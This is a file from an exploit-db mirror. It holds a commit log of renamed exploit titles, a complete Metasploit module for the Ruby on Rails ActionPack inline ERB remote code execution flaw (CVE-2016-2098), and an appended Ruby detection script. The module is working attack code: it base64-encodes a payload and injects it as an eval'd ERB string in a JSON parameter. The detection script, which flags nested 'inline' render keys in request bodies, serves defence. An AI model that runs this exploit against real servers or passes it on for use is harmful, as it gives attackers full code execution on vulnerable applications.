exploit-db-mirror/platforms/ruby/remote/40086.rb
Offensive Security fc4bc08825 DB: 2016-07-12
15 new exploits

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)

Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)

SimpleBBS <= 1.1 - Remote Commands Execution Exploit (c code)
SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)

Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)
Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)

aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability
aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection Vulnerability

Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)
Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)

PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion Vulnerability

WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
WebPortal CMS <= 0.7.4 - (code) Remote Code Execution Vulnerability

emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability
emergecolab 1.0 - (sitecode) Local File Inclusion Vulnerability

Simple Machines Forums (BBCode) Cookie Stealing Vulnerability
Simple Machines Forums - (BBCode) Cookie Stealing Vulnerability

Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability
Movie PHP Script 2.0 - (init.php anticode) Code Execution Vulnerability

Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability
Kjtechforce mailman b1 - (code) SQL Injection Delete Row Vulnerability

WordPress Activity Log Plugin 2.3.1 - Persistent XSS

IPS Community Suite 4.1.12.3 - PHP Code Injection
Adobe Flash - ATF Processing Overflow
Adobe Flash - JXR Processing Double Free
Adobe Flash - LMZA Property Decoding Heap Corruption
Adobe Flash - ATF Image Packing Overflow
Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)

Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)
Ho' Detector - Promiscuous mode detector shellcode (56 bytes)

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Ruby on Rails ActionPack Inline ERB Code Execution

Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH
Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH
Tiki Wiki CMS 15.0 - Arbitrary File Download
Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass
WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS
Device42 WAN Emulator 2.3 Traceroute Command Injection
Device42 WAN Emulator 2.3 Ping Command Injection
Device42 WAN Emulator 2.3 - Traceroute Command Injection
Device42 WAN Emulator 2.3 - Ping Command Injection

Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash

Dell KACE K1000 File Upload
Dell KACE K1000 - File Upload

Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection

Valve Steam 3.42.16.13 - Local Privilege Escalation
Beauty Parlour & SPA Saloon Management System - Blind SQL Injection
Clinic Management System - Blind SQL Injection

Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes
2016-07-12 05:05:04 +00:00


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',
      'Description' => %q{
          This module exploits a remote code execution vulnerability in the
        inline request processor of the Ruby on Rails ActionPack component.
        This vulnerability allows an attacker to process ERB to the inline
        JSON processor, which is then rendered, permitting full RCE within
        the runtime, without logging an error condition.
      },
      'Author' =>
        [
          'RageLtMan <rageltman[at]sempervictus>'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2016-2098' ]
        ],
      'Platform' => 'ruby',
      'Arch' => ARCH_RUBY,
      'Privileged' => false,
      'Targets' => [ ['Automatic', {} ] ],
      'DisclosureDate' => 'Mar 1 2016',
      'DefaultOptions' => {
        "PrependFork" => true
      },
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
      ], self.class)
  end

  def json_request
    code = Rex::Text.encode_base64(payload.encoded)
    return {
      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
    }.to_json
  end

  def exploit
    print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET',
      'ctype' => 'application/json',
      'headers' => {
        'Accept' => 'application/json'
      },
      'data' => json_request
    }, 25)
  end
end
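
The module's description notes that the request is rendered "without logging an error condition", so the request body is where a defender has to look. The following is an added detection example, not part of the module or of Metasploit: it walks a decoded JSON body and reports any parameter whose value is a hash carrying a render option key, the shape built by `json_request` above. The names `inspect_json_body`, `suspicious_render_params` and `RENDER_OPTION_KEYS` are hypothetical, the keys other than `inline` are an assumption that goes beyond what this module sends, and the sample bodies are constructed.

```ruby
require 'json'

# Render option names that should never arrive as keys of a user-supplied
# hash. "inline" is what the module sends; the rest are assumed extras.
RENDER_OPTION_KEYS = %w[inline file template partial].freeze
ERB_TAG = /<%.*?%>/m

# Recursively walk decoded JSON. A finding is recorded when a render option
# key appears inside a nested hash, i.e. a parameter whose value is a hash
# rather than the scalar the application expects.
def suspicious_render_params(node, path = [], findings = [])
  case node
  when Hash
    node.each do |key, value|
      here = path + [key.to_s]
      if RENDER_OPTION_KEYS.include?(key.to_s) && !path.empty?
        erb = value.is_a?(String) && value.match?(ERB_TAG)
        findings << { path: here.join('.'), erb: erb }
      end
      suspicious_render_params(value, here, findings)
    end
  when Array
    node.each_with_index do |value, i|
      suspicious_render_params(value, path + [i.to_s], findings)
    end
  end
  findings
end

# Entry point for a raw request body; bodies that are not JSON yield nothing.
def inspect_json_body(body)
  suspicious_render_params(JSON.parse(body))
rescue JSON::ParserError
  []
end

# Constructed sample bodies (harmless ERB, no payload).
SAMPLES = [
  '{"id":{"inline":"<%= 1 + 1 %>"}}',                # hash with inline ERB
  '{"id":"42","file":"report.pdf"}',                 # ordinary scalar params
  '{"post":{"title":"hi","tags":[{"template":"x"}]}}' # nested render key
].freeze

if $PROGRAM_NAME == __FILE__
  SAMPLES.each { |body| puts "#{body} => #{inspect_json_body(body).inspect}" }
end
```

A hit with `erb: true` on a GET request that carries a JSON body is the strongest signal. The check only surfaces the request shape; the application still must not pass request parameters directly to `render`.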